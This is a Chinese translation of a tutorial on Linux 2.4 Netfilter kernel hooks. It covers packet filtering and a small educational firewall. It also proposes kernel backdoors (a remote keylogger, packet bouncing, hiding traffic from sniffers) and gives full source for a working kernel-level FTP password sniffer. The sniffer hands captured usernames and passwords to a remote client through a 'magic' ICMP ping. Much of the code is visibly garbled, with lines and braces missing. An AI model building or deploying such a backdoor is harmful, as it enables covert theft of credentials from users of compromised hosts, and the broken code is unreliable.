
时间:2023-03-10 04:13:56



struct nf_hook_ops {
                  struct list_head list;

/* 此下的值由用户填充 */
                  nf_hookfn *hook;
                  int pf;
                  int hooknum;
                  /* Hook以升序的优先级排序 */
                  int priority;

该数据结构中的list成员用于维护Netfilter hook的列表,并且不是用户在注册hook时需要关心的重点。hook成员是一个指向nf_hookfn类型的函数的指针,该函数是这个hook被调用时执行的函数。nf_hookfn同样在linux/netfilter.h中定义。pf这个成员用于指定协议族。有效的协议族在linux/socket.h中列出,但对于IPv4我们希望使用协议族PF_INET。hooknum这个成员用于指定安装的这个函数对应的具体的hook类型,其值为表1中列出的值之一。最后,priority这个成员用于指定在执行的顺序中,这个hook函数应当在被放在什么地方。对于IPv4,可用的值在linux/netfilter_ipv4.h的nf_ip_hook_priorities枚举中定义。出于示范的目的,在后面的模块中我们将使用NF_IP_PRI_FIRST。
    注册一个Netfilter hook需要调用nf_register_hook()函数,以及用到一个nf_hook_ops数据结构。nf_register_hook()函数以一个nf_hook_ops数据结构的地址作为参数并且返回一个整型的值。但是,如果你真正的看了在net/core/netfilter.c中的nf_register_hook()函数的实现代码,你会发现该函数总是返回0。以下提供的是一个示例代码,该示例代码简单的注册了一个丢弃所有到达的数据包的函数。该代码同时展示了Netfilter的返回值如何被解析。

示例代码1 : Netfilter hook的注册
* 安装一个丢弃所有到达的数据包的Netfilter hook函数的示例代码 

#define __KERNEL__
#define MODULE

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>

/* 用于注册我们的函数的数据结构 */
static struct nf_hook_ops nfho;

/* 注册的hook函数的实现 */
unsigned int hook_func(unsigned int hooknum,
                       struct sk_buff **skb,
                       const struct net_device *in,
                       const struct net_device *out,
                       int (*okfn)(struct sk_buff *))
    return NF_DROP;           /* 丢弃所有的数据包 */

/* 初始化程序 */
int init_module()
    /* 填充我们的hook数据结构 */
    nfho.hook = hook_func;         /* 处理函数 */
    nfho.hooknum  = NF_IP_PRE_ROUTING; /* 使用IPv4的第一个hook */
    nfho.pf       = PF_INET;
    nfho.priority = NF_IP_PRI_FIRST;   /* 让我们的函数首先执行 */


return 0;

/* 清除程序 */
void cleanup_module()

这就是全部内容,从示例代码1中,你可以看到,注销一个Netfilter hook是一件很简单事情,只需要调用nf_unregister_hook()函数,并且以你之前用于注册这个hook时用到的相同的数据结构的地址作为参数。

-- [4 - Netfilter 基本的数据报过滤技术
---- [4.1 - 深入hook函数


typedef unsigned int nf_hookfn(unsigned int hooknum,
                                         struct sk_buff **skb,
                                         const struct net_device *in,
                                         const struct net_device *out,
                                         int (*okfn)(struct sk_buff *));


sk_buff数据结构中最有用的部分可能就是那三个描述传输层包头(例如:UDP, TCP, ICMP, SPX)、网络层包头(例如:IPv4/6, IPX, RAW)以及链路层包头(例如:以太网或者RAW)的联合(union)了。这三个联合的名字分别是h、nh以及mac。这些联合包含了几个结构,依赖于具体的数据包中使用的协议。使用者应当注意:传输层包头和网络层包头可能是指向内存中的同一个位置。这是TCP数据包可能出现的情况,其中h和nh都应当被看作是指向IP头结构的指针。这意味着尝试通过h->th获取一个值,并认为该指针指向一个TCP头,将会得到错误的结果。因为h->th实际上是指向的IP头,与nh->iph得到的结果相同。

接下来让我们感兴趣的其它部分是len和data这两个域。len指定了从data开始的数据包中的数据的总长度。好了,现在我们知道如何在sk_buff数据结构中分别访问协议头和数据包中的数据了。Netfilter hook函数中有用的信息中其它的有趣的部分是什么呢?

紧跟在skb之后的两个参数是指向net_device数据结构的指针,net_device数据结构被Linux内核用于描述所有类型的网络接口。这两个参数中的第一个——in,用于描述数据包到达的接口,毫无疑问,参数out用于描述数据包离开的接口。必须明白,在通常情况下,这两个参数中将只有一个被提供。例如:参数in只用于NF_IP_PRE_ROUTING和NF_IP_LOCAL_IN hook,参数out只用于NF_IP_LOCAL_OUT和NF_IP_POST_ROUTING hook。在这一个阶段中,我还没有测试对于NF_IP_FORWARD hook,这两个参数中哪些是有效的,但是如果你能在使用之前先确定这些指针是非空的,那么你是非常优秀的!

最后,传递给hook函数的最后一个参数是一个命名为okfn函数指针,该函数以一个sk_buff数据结构作为它唯一的参数,并且返回一个整型的值。我不是很确定这个函数是干什么用的,在net/core/netfilter.c中查看,有两个地方调用了这个okfn函数。这两个地方是分别在函数nf_hook_slow()中以及函数nf_reinject()中,在其中的某个位置,当Netfilter hook的返回值为NF_ACCEPT时被调用。如果任何人有更多的关于okfn函数的信息,请务必告知。
    ** 译注:Linux核心网络堆栈中有一个全局变量 : struct list_head nf_hooks[NPROTO][NF_MAX_HOOKS],该变量是一个二维数组,其中第一维用于指定协议族,第二维用于指定hook的类型(表1中定义的类型)。注册一个Netfilter hook实际就是在由协议族和hook类型确定的链表中添加一个新的节点。
    以下代码摘自 net/core/netfilter,nf_register_hook()函数的实现:
int nf_register_hook(struct nf_hook_ops *reg)
    struct list_head *i;

    for (i = nf_hooks[reg->pf][reg->hooknum].next; 
         i != &nf_hooks[reg->pf][reg->hooknum]; 
         i = i->next) {
        if (reg->priority < ((struct nf_hook_ops *)i)->priority)
    list_add(&reg->list, i->prev);
    return 0;


#define NF_HOOK nf_hook_slow
#define NF_HOOK(pf, hook, skb, indev, outdev, okfn)            /
(list_empty(&nf_hooks[(pf)][(hook)])                    /
? (okfn)(skb)                                /
: nf_hook_slow((pf), (hook), (skb), (indev), (outdev), (okfn)))
#define NF_HOOK(pf, hook, skb, indev, outdev, okfn) (okfn)(skb)
    ** 译注完
----[4.2 - 基于接口进行过滤

这应该是我们能做的最简单的过滤技术了。还记得我们的hook函数接收的参数中的那些net_device数据结构吗?使用相应的net_device数据结构的name这个成员,你就可以根据数据包的源接口和目的接口来选择是否丢弃它。如果想丢弃所有到达接口eth0的数据包,所有你需要做的仅仅是将in->name的值与"eth0"做比较,如果名字匹配,那么hook函数简单的返回NF_DROP即可,数据包会被自动销毁。就是这么简单!完成该功能的示例代码见如下的示例代码2。注意,Light-Weight FireWall模块将会提供所有的本文提到的过滤方法的简单示例。它还包含了一个IOCTL接口以及用于动态改变其特性的应用程序。
    示例代码2 : 基于源接口的数据包过滤
* 安装一个丢弃所有进入我们指定接口的数据包的Netfilter hook函数的示例代码

#define __KERNEL__
#define MODULE
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
/* 用于注册我们的函数的数据结构 */
static struct nf_hook_ops nfho;

/* 我们丢弃的数据包来自的接口的名字 */
static char *drop_if = "lo";

/* 注册的hook函数的实现 */
unsigned int hook_func(unsigned int hooknum,
                       struct sk_buff **skb,
                       const struct net_device *in,
                       const struct net_device *out,
                       int (*okfn)(struct sk_buff *))
    if (strcmp(in->name, drop_if) == 0) {
        printk("Dropped packet on %s.../n", drop_if);
        return NF_DROP;
    } else {
        return NF_ACCEPT;

/* 初始化程序 */
int init_module()
    /* 填充我们的hook数据结构 */
    nfho.hook     = hook_func;         /* 处理函数 */
    nfho.hooknum  = NF_IP_PRE_ROUTING; /* 使用IPv4的第一个hook */
    nfho.pf       = PF_INET;
    nfho.priority = NF_IP_PRI_FIRST;   /* 让我们的函数首先执行 */

    return 0;
/* 清除程序 */
void cleanup_module()


----[ 4.3 - 基于地址进行过滤

      struct sk_buff *sb = *skb;    /* Remove 1 level of indirection* /

    示例代码3 : 检查收到的数据包的源IP
      unsigned char *deny_ip = "/x7f/x00/x00/x01";  /* */

static int check_ip_packet(struct sk_buff *skb)
              /* We don't want any NULL pointers in the chain to
               * the IP header. */
              if (!skb )return NF_ACCEPT;
              if (!(skb->nh.iph)) return NF_ACCEPT;
              if (skb->nh.iph->saddr == *(unsigned int *)deny_ip) { 
              return NF_DROP;

return NF_ACCEPT;
    示例代码4 : 基于数据包源地址的过滤
/* 安装丢弃所有来自指定IP地址的数据包的Netfilter hook的示例代码 */

#define __KERNEL__
#define MODULE

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/skbuff.h>
#include <linux/ip.h>                  /* For IP header */
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>

/* 用于注册我们的函数的数据结构 */
static struct nf_hook_ops nfho;

/* 我们要丢弃的数据包来自的地址,网络字节序 */
static unsigned char *drop_ip = "/x7f/x00/x00/x01";

/* 注册的hook函数的实现 */
unsigned int hook_func(unsigned int hooknum,
                       struct sk_buff **skb,
                       const struct net_device *in,
                       const struct net_device *out,
                       int (*okfn)(struct sk_buff *))
    struct sk_buff *sb = *skb;
    // 译注:作者提供的代码中比较地址是否相同的方法是错误的,见注释掉的部分
    if (sb->nh.iph->saddr == *(unsigned int *)drop_ip) {
    // if (sb->nh.iph->saddr == drop_ip) {
        printk("Dropped packet from... %d.%d.%d.%d/n",
      *drop_ip, *(drop_ip + 1),
  *(drop_ip + 2), *(drop_ip + 3));
        return NF_DROP;
    } else {
        return NF_ACCEPT;

/* 初始化程序 */
int init_module()
    /* 填充我们的hook数据结构 */
    nfho.hook       = hook_func;         /* 处理函数 */
    nfho.hooknum  = NF_IP_PRE_ROUTING; /* 使用IPv4的第一个hook */
    nfho.pf       = PF_INET;
    nfho.priority = NF_IP_PRI_FIRST;   /* 让我们的函数首先执行 */


return 0;

/* 清除程序 */
void cleanup_module()

----[ 4.4 - 基于TCP端口进行过滤

    示例代码5 : 检查收到的数据包的TCP目的端口
          unsigned char *deny_port = "/x00/x19";   /* port 25 */


static int check_tcp_packet(struct sk_buff *skb)
              struct tcphdr *thead;

/* We don't want any NULL pointers in the chain
               * to the IP header. */
              if (!skb ) return NF_ACCEPT;
              if (!(skb->nh.iph)) return NF_ACCEPT;

/* Be sure this is a TCP packet first */
              if (skb->nh.iph->protocol != IPPROTO_TCP) {
                  return NF_ACCEPT;

thead = (struct tcphdr *)(skb->data +
                                       (skb->nh.iph->ihl * 4));

/* Now check the destination port */
              if ((thead->dest) == *(unsigned short *)deny_port) {
                  return NF_DROP;
          return NF_ACCEPT;


--[ 5 - Netfilter hook的其它可能用法

在这里,我将提出其它很酷的利用Netfilter hook的点子,5.1节将简单的给出精神食粮,而5.2节将讨论和给出可以工作的基于内核的FTP密码嗅探器的代码,它的远程密码获取功能是确实可用的。事实上,它工作的令我吃惊的好,并且我编写了它。
----[ 5.1 - 隐藏后门的守护进程

    有了赋予内核级程序员的强大力量,很多事情成为可能。其中最有趣的(也是让系统管理员恐慌的)一个就是嵌入到内核中的后门。毕竟,如果后门不作为一个进程运行,那么我们怎么知道它的运行?当然,还是有办法让你的内核揪出这样的后门来,但是它们可不像运行ps命令一样容易和简单。现今,将后门代码放到内核中去的点子已经并不新鲜了。但是,我在这里所提出的是安放一个用作内核后门的简单的网络服务。你猜对了,正是Netfilter hook!
    如果你已经具备必要的技能并且情愿以做试验的名义使你的内核崩溃,那么你就可以构建简单但是有用的,完全位于内核中的,可以远程访问的网络服务了。基本上一个Netfilter hook可以通过观察收到的数据包来查找一个“魔法”数据包,并且当接收到这个“魔法”数据包时干指定的事情。结果可以通过Netfilter hook来发送。并且该hook函数可以返回NF_STOLEN,以使得收到的“魔法”数据包可以走得更远。但是要注意,当以这种方式来发送时,输出数据包对于输出Netfilter hook仍然是可见的。因此用户空间完全不知道这个“魔法”数据包的曾经到达,但是它们还是能看到你送所出的。当心!因为在泄密主机上的嗅探器不能看到这个包并不意味着在其它中间宿主主机上的嗅探器也看不到这个包。
    kossak与lifeline曾为Phrack写了一篇精彩的文章,该文描述了如何通过注册数据包类型处理器来完成这样的功能。虽然本文涉及的是Netfilter hook,我仍然建议阅读他们的这篇文章(第55期,文件12),因为它是一篇给出了一些非常有趣的点子的有趣读物。
    那么,后门Netfilter hook可以干些什么工作呢?以下是一些建议:
    -- 远程访问击键记录器(key-logger)。模块记录击键,并且当远程主机发送一个PING请求时,结果被送到该主机。这样,可以生成一个类似于稳定的(非洪水的)PING应答流的击键信息的流。当然,你可能想要实现一个简单的加密,这样,ASCII键不会立即暴露它们自己,并且某些警觉的系统管理员会想:“坚持,我以前都是通过我的SSH会话来键入那些的!Oh $%@T%&!”。
    -- 各种简单的管理员任务,例如获取当前登录到主机的用户的列表或责获取打开的网络连接的信息。
    -- 并非一个真正的后门,而是位于网络边界的模块,并且阻挡任何被疑为来自特洛伊木马、ICMP隐蔽通道或者像KaZaa这样的文件共享工具的通信。
    -- 文件传输“服务器”。我最近已经实现了这个主意,由此引起的Linux核心编程是数小时的乐趣:)
    -- 数据包跳跃。重定向目的为木马主机指定端口的数据包到其它的IP主机和端口,并且从那台主机发回数据包到发起者。没有进程被派生,并且最妙的是,没有网络套接字被打开。
    -- 上面描述的数据包跳跃用于与网络中的关键系统以半隐蔽方式通信。例如:配置路由器等。
    -- FTP/POP3/Telnet密码嗅探器。嗅探输出的密码并保存相关信息,直到进入的“魔法”数据包要求获取它们。

----[ 5.2 - 基于内核的FTP密码嗅探器

在这里展现的是一个简单的,原理性的,用做Netfilter后门的模块。该模块嗅探输出的FTP数据包,查找对于一个FTP服务器一个USER于PASS命令对。当这样一个命令对被发现后,该模块接下来将等待一个“魔法”ICMP ECHO(ping)数据包,该数据包应当足够大,使其能返回服务器的IP地址、用户名以及密码。同时提供了一个快速的发送一个“魔法”数据包,获取返回然后打印返回信息的技巧。一旦用户名/密码对从模块读取后,模块将接着查找下一对。注意,模块每次只保存一个对。以上是简要的浏览,是该展示更多的细节,来看模块如何做到这些的时候了。
    当模块加载时,模块的init_module()函数简单的注册了两个Netfilter hook。第一个用于查看输入的数据包(在NF_IP_PRE_ROUTING处),尝试发现“魔法”ICMP数据包。接下来的一个用于查看离开该模块被安装的主机的数据包(在NF_IP_POST_ROUTING处),这个函数正是搜索和捕获FTP的USER和PASS数据包的地方。cleanup_module()函数只是简单的注销这两个hook。
    watch_out()是用于hook NF_IP_POST_ROUTING的函数,查看这个函数你可以看到,它的执行的操作非常简单。当一个数据包进入这个函数过后,将经过各种检查,以确定它是一个FTP数据包。如果它不是一个FTP数据包,那么立即返回NF_ACCEPT。如果它是一个FTP数据包,那么该模块进行检查是否已经存在一个用户名/密码对。如果存在(以have_pair的非零值标识),那么返回NF_ACCEPT,该数据包最终能够离开该系统。否则,check_ftp()函数被调用,这是密码提取实际发生的地方。如果没有先前的数据包已经被接收,那么target_ip和target_port变量应当被清除。
表3 : 接口类型的常用值

类型代码        接口类型
ARPHRD_PPP        点对点(例如拨号)

------[ 5.2.1 - 源代码 : nfsniff.c

<++> nfsniff/nfsniff.c
/* Simple proof-of-concept for kernel-based FTP password sniffer.
* A captured Username and Password pair are sent to a remote host
* when that host sends a specially formatted ICMP packet. Here we
* shall use an ICMP_ECHO packet whose code field is set to 0x5B
* *AND* the packet has enough
* space after the headers to fit a 4-byte IP address and the
* username and password fields which are a max. of 15 characters
* each plus a NULL byte. So a total ICMP payload size of 36 bytes. */

/* Written by bioforge,  March 2003 */

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/skbuff.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <linux/icmp.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/if_arp.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>

#define MAGIC_CODE   0x5B
#define REPLY_SIZE   36

#define ICMP_PAYLOAD_SIZE  (htons(sb->nh.iph->tot_len) /
                   - sizeof(struct iphdr) /
                   - sizeof(struct icmphdr))

/* THESE values are used to keep the USERname and PASSword until
* they are queried. Only one USER/PASS pair will be held at one
* time and will be cleared once queried. */
static char *username = NULL;
static char *password = NULL;
static int  have_pair = 0;     /* Marks if we already have a pair */

/* Tracking information. Only log USER and PASS commands that go to the
* same IP address and TCP port. */
static unsigned int target_ip = 0;
static unsigned short target_port = 0;

/* Used to describe our Netfilter hooks */
struct nf_hook_ops  pre_hook;           /* Incoming */
struct nf_hook_ops  post_hook;           /* Outgoing */

/* Function that looks at an sk_buff that is known to be an FTP packet.
* Looks for the USER and PASS fields and makes sure they both come from
* the one host as indicated in the target_xxx fields */
static void check_ftp(struct sk_buff *skb)
   struct tcphdr *tcp;
   char *data;
   int len = 0;
   int i = 0;
   tcp = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4));
   data = (char *)((int)tcp + (int)(tcp->doff * 4));

/* Now, if we have a username already, then we have a target_ip.
    * Make sure that this packet is destined for the same host. */
   if (username)
     if (skb->nh.iph->daddr != target_ip || tcp->source != target_port)
   /* Now try to see if this is a USER or PASS packet */
   if (strncmp(data, "USER ", 5) == 0) {          /* Username */
      data += 5;
      if (username)  return;
      while (*(data + i) != '/r' && *(data + i) != '/n'
         && *(data + i) != '/0' && i < 15) {
      if ((username = kmalloc(len + 2, GFP_KERNEL)) == NULL)
      memset(username, 0x00, len + 2);
      memcpy(username, data, len);
      *(username + len) = '/0';           /* NULL terminate */
   } else if (strncmp(data, "PASS ", 5) == 0) {   /* Password */
      data += 5;

/* If a username hasn't been logged yet then don't try logging
       * a password */
      if (username == NULL) return;
      if (password)  return;
      while (*(data + i) != '/r' && *(data + i) != '/n'
         && *(data + i) != '/0' && i < 15) {

if ((password = kmalloc(len + 2, GFP_KERNEL)) == NULL)
      memset(password, 0x00, len + 2);
      memcpy(password, data, len);
      *(password + len) = '/0';           /* NULL terminate */
   } else if (strncmp(data, "QUIT", 4) == 0) {
      /* Quit command received. If we have a username but no password,
       * clear the username and reset everything */
      if (have_pair)  return;
      if (username && !password) {
     username = NULL;
     target_port = target_ip = 0;
     have_pair = 0;
   } else {

if (!target_ip)
     target_ip = skb->nh.iph->daddr;
   if (!target_port)
     target_port = tcp->source;

if (username && password)
     have_pair++;               /* Have a pair. Ignore others until
                    * this pair has been read. */
//   if (have_pair)
//     printk("Have password pair!  U: %s   P: %s/n", username, password);

/* Function called as the POST_ROUTING (last) hook. It will check for
* FTP traffic then search that traffic for USER and PASS commands. */
static unsigned int watch_out(unsigned int hooknum,
                  struct sk_buff **skb,
                  const struct net_device *in,
                  const struct net_device *out,
                  int (*okfn)(struct sk_buff *))
   struct sk_buff *sb = *skb;
   struct tcphdr *tcp;
   /* Make sure this is a TCP packet first */
   if (sb->nh.iph->protocol != IPPROTO_TCP)
     return NF_ACCEPT;               /* Nope, not TCP */
   tcp = (struct tcphdr *)((sb->data) + (sb->nh.iph->ihl * 4));
   /* Now check to see if it's an FTP packet */
   if (tcp->dest != htons(21))
     return NF_ACCEPT;               /* Nope, not FTP */
   /* Parse the FTP packet for relevant information if we don't already
    * have a username and password pair. */
   if (!have_pair)
   /* We are finished with the packet, let it go on its way */
   return NF_ACCEPT;

/* Procedure that watches incoming ICMP traffic for the "Magic" packet.
* When that is received, we tweak the skb structure to send a reply
* back to the requesting host and tell Netfilter that we stole the
* packet. */
static unsigned int watch_in(unsigned int hooknum,
                 struct sk_buff **skb,
                 const struct net_device *in,
                 const struct net_device *out,
                 int (*okfn)(struct sk_buff *))
   struct sk_buff *sb = *skb;
   struct icmphdr *icmp;
   char *cp_data;               /* Where we copy data to in reply */
   unsigned int   taddr;           /* Temporary IP holder */

/* Do we even have a username/password pair to report yet? */
   if (!have_pair)
     return NF_ACCEPT;
   /* Is this an ICMP packet? */
   if (sb->nh.iph->protocol != IPPROTO_ICMP)
     return NF_ACCEPT;
   icmp = (struct icmphdr *)(sb->data + sb->nh.iph->ihl * 4);

/* Is it the MAGIC packet? */
   if (icmp->code != MAGIC_CODE || icmp->type != ICMP_ECHO
      return NF_ACCEPT;
   /* Okay, matches our checks for "Magicness", now we fiddle with
    * the sk_buff to insert the IP address, and username/password pair,
    * swap IP source and destination addresses and ethernet addresses
    * if necessary and then transmit the packet from here and tell
    * Netfilter we stole it. Phew... */
   taddr = sb->nh.iph->saddr;
   sb->nh.iph->saddr = sb->nh.iph->daddr;
   sb->nh.iph->daddr = taddr;

sb->pkt_type = PACKET_OUTGOING;

switch (sb->dev->type) {
    case ARPHRD_PPP:               /* No fiddling needs doing */
    case ARPHRD_ETHER:
       unsigned char t_hwaddr[ETH_ALEN];
       /* Move the data pointer to point to the link layer header */
       sb->data = (unsigned char *)sb->mac.ethernet;
       sb->len += ETH_HLEN; //sizeof(sb->mac.ethernet);
       memcpy(t_hwaddr, (sb->mac.ethernet->h_dest), ETH_ALEN);
       memcpy((sb->mac.ethernet->h_dest), (sb->mac.ethernet->h_source),
       memcpy((sb->mac.ethernet->h_source), t_hwaddr, ETH_ALEN);

/* Now copy the IP address, then Username, then password into packet */
   cp_data = (char *)((char *)icmp + sizeof(struct icmphdr));
   memcpy(cp_data, &target_ip, 4);
   if (username)
     memcpy(cp_data + 4, username, 16);
   if (password)
     memcpy(cp_data + 20, password, 16);
   /* This is where things will die if they are going to.
    * Fingers crossed... */

/* Now free the saved username and password and reset have_pair */
   username = password = NULL;
   have_pair = 0;
   target_port = target_ip = 0;

//   printk("Password retrieved/n");
   return NF_STOLEN;

int init_module()
   pre_hook.hook     = watch_in;
   pre_hook.pf       = PF_INET;
   pre_hook.priority = NF_IP_PRI_FIRST;
   pre_hook.hooknum  = NF_IP_PRE_ROUTING;
   post_hook.hook     = watch_out;
   post_hook.pf       = PF_INET;
   post_hook.priority = NF_IP_PRI_FIRST;
   post_hook.hooknum  = NF_IP_POST_ROUTING;
   return 0;

void cleanup_module()
   if (password)
   if (username)

------[ 5.2.2 - 源代码 : getpass.c

<++> nfsniff/getpass.c
/* getpass.c - simple utility to get username/password pair from
* the Netfilter backdoor FTP sniffer. Very kludgy, but effective.
* Mostly stripped from my source for InfoPig.
* Written by bioforge  -  March 2003 */

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

#ifndef __USE_BSD
# define __USE_BSD               /* We want the proper headers */
# include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/* Function prototypes */
static unsigned short checksum(int numwords, unsigned short *buff);

int main(int argc, char *argv[])
    unsigned char dgram[256];           /* Plenty for a PING datagram */
    unsigned char recvbuff[256];
    struct ip *iphead = (struct ip *)dgram;
    struct icmp *icmphead = (struct icmp *)(dgram + sizeof(struct ip));
    struct sockaddr_in src;
    struct sockaddr_in addr;
    struct in_addr my_addr;
    struct in_addr serv_addr;
    socklen_t src_addr_size = sizeof(struct sockaddr_in);
    int icmp_sock = 0;
    int one = 1;
    int *ptr_one = &one;
    if (argc < 3) {
    fprintf(stderr, "Usage:  %s remoteIP myIP/n", argv[0]);

/* Get a socket */
    if ((icmp_sock = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
    fprintf(stderr, "Couldn't open raw socket! %s/n",

/* set the HDR_INCL option on the socket */
    if(setsockopt(icmp_sock, IPPROTO_IP, IP_HDRINCL,
          ptr_one, sizeof(one)) < 0) {
    fprintf(stderr, "Couldn't set HDRINCL option! %s/n",
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(argv[1]);
    my_addr.s_addr = inet_addr(argv[2]);
    memset(dgram, 0x00, 256);
    memset(recvbuff, 0x00, 256);
    /* Fill in the IP fields first */
    iphead->ip_hl  = 5;
    iphead->ip_v   = 4;
    iphead->ip_tos = 0;
    iphead->ip_len = 84;
    iphead->ip_id  = (unsigned short)rand();
    iphead->ip_off = 0;
    iphead->ip_ttl = 128;
    iphead->ip_p   = IPPROTO_ICMP;
    iphead->ip_sum = 0;
    iphead->ip_src = my_addr;
    iphead->ip_dst = addr.sin_addr;
    /* Now fill in the ICMP fields */
    icmphead->icmp_type = ICMP_ECHO;
    icmphead->icmp_code = 0x5B;
    icmphead->icmp_cksum = checksum(42, (unsigned short *)icmphead);
    /* Finally, send the packet */
    fprintf(stdout, "Sending request.../n");
    if (sendto(icmp_sock, dgram, 84, 0, (struct sockaddr *)&addr,
           sizeof(struct sockaddr)) < 0) {
    fprintf(stderr, "/nFailed sending request! %s/n",
    return 0;

fprintf(stdout, "Waiting for reply.../n");
    if (recvfrom(icmp_sock, recvbuff, 256, 0, (struct sockaddr *)&src,
         &src_addr_size) < 0) {
    fprintf(stdout, "Failed getting reply packet! %s/n",
    iphead = (struct ip *)recvbuff;
    icmphead = (struct icmp *)(recvbuff + sizeof(struct ip));
    memcpy(&serv_addr, ((char *)icmphead + 8),
           sizeof (struct in_addr));
    fprintf(stdout, "Stolen for ftp server %s:/n", inet_ntoa(serv_addr));
    fprintf(stdout, "Username:    %s/n",
         (char *)((char *)icmphead + 12));
    fprintf(stdout, "Password:    %s/n",
         (char *)((char *)icmphead + 28));
    return 0;

/* Checksum-generation function. It appears that PING'ed machines don't
* reply to PINGs with invalid (ie. empty) ICMP Checksum fields...
* Fair enough I guess. */
static unsigned short checksum(int numwords, unsigned short *buff)
   unsigned long sum;
   for(sum = 0;numwords > 0;numwords--)
     sum += *buff++;   /* add next word, then increment pointer */
   sum = (sum >> 16) + (sum & 0xFFFF);
   sum += (sum >> 16);
   return ~sum;

** 译注:上述两个文件的Makefile:

<++> nfsniff/Makefile
LIBS=-L/usr/lib -lc
# Change include directory for your kernel                                   
all : nfsniff.o getpass                                
nfsniff.o : nfsniff.c                                  
        gcc -c nfsniff.c -o nfsniff~.o $(MODULE_CFLAGS)
        ld -r -o nfsniff.o nfsniff~.o $(LIBS)          
getpass.o : getpass.c                                  
        gcc -c getpass.c $(EXECUTE_CFLAGS)             
getpass : getpass.o                                    
        gcc -o getpass getpass.o $(EXECUTE_CFLAGS)     
clean :                                                
        rm -f *.o getpass                              


--[ 6 - 在Libpcap中隐藏网络通信

----[ 6.1 - SOCK_PACKET、SOCK_RAW与Libpcap

    当核心网络堆栈收到一个数据包的时候,检查该数据包是否是某个packet套接字感兴趣的数据包。如果是,则将该数据递交给那些对其感兴趣的套接字。如果不是,该数据包继续它的旅程,进入TCP、UDP或者其它类型的套接字。对于SOCK_RAW类型的套接字同样如此。原始套接字很类似于packet套接字,只是原始套接字不提供链路层的包头。一个利用原始套接字的实用程序的例子是我的SYNalert程序,参见参考文献[3](请原谅我在这儿插入的题外话 :)。
------[ 6.2 给狼披上羊皮

    movl  (address of our function),  %eax
    jmp   *eax

    0xb8 0x00 0x00 0x00 0x00
    0xff 0xe0

如果我们在Linux核心模块的初始化时将上例中的函数地址替换为我们的hook函数的地址,我们就能够使我们的hook函数先运行。当我们想运行原来的函数时,我们只需要在开始时恢复函数原来的指令,调用该函数并且替换我们的劫持代码。简单而有效。Silvio Cesare 不久前写过一篇文章,讲述如何实现内核函数劫持,参见参考文献[4]。

--[ 7 - 结束语


--[ A - 轻量级防火墙
----[ A.1 - 概述

    由于LWFW的源代码已经有足够的文档了,我在这儿只给出它如何工作的简单概述。当LWFW模块被加载后,它的第一个任务就是尝试注册控制设置。注意在LWFW的ioctl()控制接口可用之前,需要在/dev下创建一个字符设备文件。如果控制设备注册成功,"in use"标志被清除并且对NF_IP_PRE_ROUTE进行hook的函数被注册。清除函数执行相反的操作。
    -- 源接口
    -- 源IP地址
    -- 目的TCP端口

----[ A.2 - 源代码 : lwfw.c

<++> lwfw/lwfw.c
/* Light-weight Fire Wall. Simple firewall utility based on
* Netfilter for 2.4. Designed for educational purposes.

* Written by bioforge  -  March 2003.

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/net.h>
#include <linux/types.h>
#include <linux/skbuff.h>
#include <linux/string.h>
#include <linux/malloc.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>

#include <asm/errno.h>
#include <asm/uaccess.h>

#include "lwfw.h"

/* Local function prototypes */
static int set_if_rule(char *name);
static int set_ip_rule(unsigned int ip);
static int set_port_rule(unsigned short port);
static int check_ip_packet(struct sk_buff *skb);
static int check_tcp_packet(struct sk_buff *skb);
static int copy_stats(struct lwfw_stats *statbuff);

/* Some function prototypes to be used by lwfw_fops below. */
static int lwfw_ioctl(struct inode *inode, struct file *file,
              unsigned int cmd, unsigned long arg);
static int lwfw_open(struct inode *inode, struct file *file);
static int lwfw_release(struct inode *inode, struct file *file);

/* Various flags used by the module */
/* This flag makes sure that only one instance of the lwfw device
* can be in use at any one time. */
static int lwfw_ctrl_in_use = 0;

/* This flag marks whether LWFW should actually attempt rule checking.
* If this is zero then LWFW automatically allows all packets. */
static int active = 0;

/* Specifies options for the LWFW module */
static unsigned int lwfw_options = (LWFW_IF_DENY_ACTIVE
                    | LWFW_IP_DENY_ACTIVE
                    | LWFW_PORT_DENY_ACTIVE);

static int major = 0;               /* Control device major number */

/* This struct will describe our hook procedure. */
struct nf_hook_ops nfkiller;

/* Module statistics structure */
static struct lwfw_stats lwfw_statistics = {0, 0, 0, 0, 0};

/* Actual rule 'definitions'. */
/* TODO:  One day LWFW might actually support many simultaneous rules.
* Just as soon as I figure out the list_head mechanism... */
static char *deny_if = NULL;                 /* Interface to deny */
static unsigned int deny_ip = 0x00000000;    /* IP address to deny */
static unsigned short deny_port = 0x0000;   /* TCP port to deny */

* This is the interface device's file_operations structure
struct file_operations  lwfw_fops = {
     NULL                   /* Will be NULL'ed from here... */

MODULE_DESCRIPTION("Light-Weight Firewall for Linux 2.4");

* This is the function that will be called by the hook
unsigned int lwfw_hookfn(unsigned int hooknum,
               struct sk_buff **skb,
               const struct net_device *in,
               const struct net_device *out,
               int (*okfn)(struct sk_buff *))
   unsigned int ret = NF_ACCEPT;
   /* If LWFW is not currently active, immediately return ACCEPT */
   if (!active)
     return NF_ACCEPT;
   /* Check the interface rule first */
   if (deny_if && DENY_IF_ACTIVE) {
      if (strcmp(in->name, deny_if) == 0) {   /* Deny this interface */
     return NF_DROP;
   /* Check the IP address rule */
